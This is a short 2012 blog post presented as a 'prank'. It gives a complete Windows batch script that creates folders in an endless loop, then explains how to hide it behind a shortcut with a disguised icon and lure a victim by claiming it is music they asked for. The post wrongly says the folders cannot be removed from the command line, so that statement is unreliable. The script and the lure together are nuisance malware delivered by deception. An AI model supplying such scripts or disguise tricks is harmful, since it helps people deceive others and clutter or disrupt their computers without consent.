Related Posts Plugin for WordPress, Blogger...

Wednesday 16 May 2012

A Computer Trick to Make over 1,000 folders in few seconds


Here I will teach you a simple prank that will make an unlimited amount of folders in any place you want.

1. Open notepad and type :

@echo off
:top
md %random%
goto top 

@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creates folders with random names.
goto top – return to label :top, infinite loop.

2. Save it as 1000folders.bat

3. After that you will get icon that looks as show below:

People probably are not gonna click on an icon that looks like this picture, so to make it better (funnier and easier to prank people with) make a short-cut to it.

4. Right click on icon and click Create Shortcut.

5. Right click on shortcut and click properties , then click on Change Icon and rename icon.

Tell the person that you found the music they wanted and downloaded it on their computer. That way, they will think its a shortcut to the music and they will click on it. Then, they will think its loading so they won't exit right away but when they finally realize its not going to load  it will be to late. Its impossible to delete them using cmd you have to find all of them and delete them manually…

0 comments:

Post a Comment

 
Zhacks